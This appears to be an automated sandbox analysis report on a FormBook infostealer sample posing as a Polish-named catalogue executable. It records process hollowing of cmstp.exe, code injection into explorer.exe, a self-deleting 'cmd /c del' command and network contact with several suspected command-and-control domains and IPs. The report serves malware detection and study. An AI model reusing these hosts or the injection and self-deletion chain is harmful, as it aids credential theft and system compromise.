          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046890AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04683D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04667D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04664120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04664120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04664120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04664120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04664120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046CA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04674D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04674D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04674D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046D41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046F8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046735A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04671DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04671DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04671DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04642D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04642D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04642D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04642D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04642D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046D4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04684A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04684A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046FFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04678E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04658A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04645210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04645210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04645210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04645210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04663A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046716E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046576E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046736CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046FFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04688EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04710EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04710EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04710EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04673B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04673B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04644F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04644F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00409B50 LdrLoadDll,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_100057F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 104.248.163.187 80
          Source: C:\Windows\explorer.exeDomain query: www.tankomixing.com
          Source: C:\Windows\explorer.exeDomain query: www.leads-mania.club
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.33 80
          Source: C:\Windows\explorer.exeDomain query: www.bezhantrading.com
          Source: C:\Windows\explorer.exeDomain query: www.americanvisionvinyl.com
          Source: C:\Windows\explorer.exeNetwork Connect: 46.38.243.234 80
          Source: C:\Windows\explorer.exeDomain query: www.iccsukltd.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80
          Source: C:\Windows\explorer.exeDomain query: www.affiliatemarketingproducts.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 153.127.214.206 80
          Source: C:\Windows\explorer.exeNetwork Connect: 138.68.74.116 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.184.156 80
          Source: C:\Windows\explorer.exeDomain query: www.worryterrible.space
          Source: C:\Windows\explorer.exeDomain query: www.alles-abgedeckt.com
          Source: C:\Windows\explorer.exeDomain query: www.dempseynutrition.com
          Source: C:\Windows\explorer.exeDomain query: www.harada-insatsu.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: D0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeMemory written: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3440
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeProcess created: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: explorer.exe, 00000005.00000000.380351943.0000000000EE0000.00000002.00020000.sdmp, cmstp.exe, 0000000B.00000002.619338483.0000000002ED0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.380351943.0000000000EE0000.00000002.00020000.sdmp, cmstp.exe, 0000000B.00000002.619338483.0000000002ED0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.380351943.0000000000EE0000.00000002.00020000.sdmp, cmstp.exe, 0000000B.00000002.619338483.0000000002ED0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.380351943.0000000000EE0000.00000002.00020000.sdmp, cmstp.exe, 0000000B.00000002.619338483.0000000002ED0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10004343 cpuid
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1000568B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPE
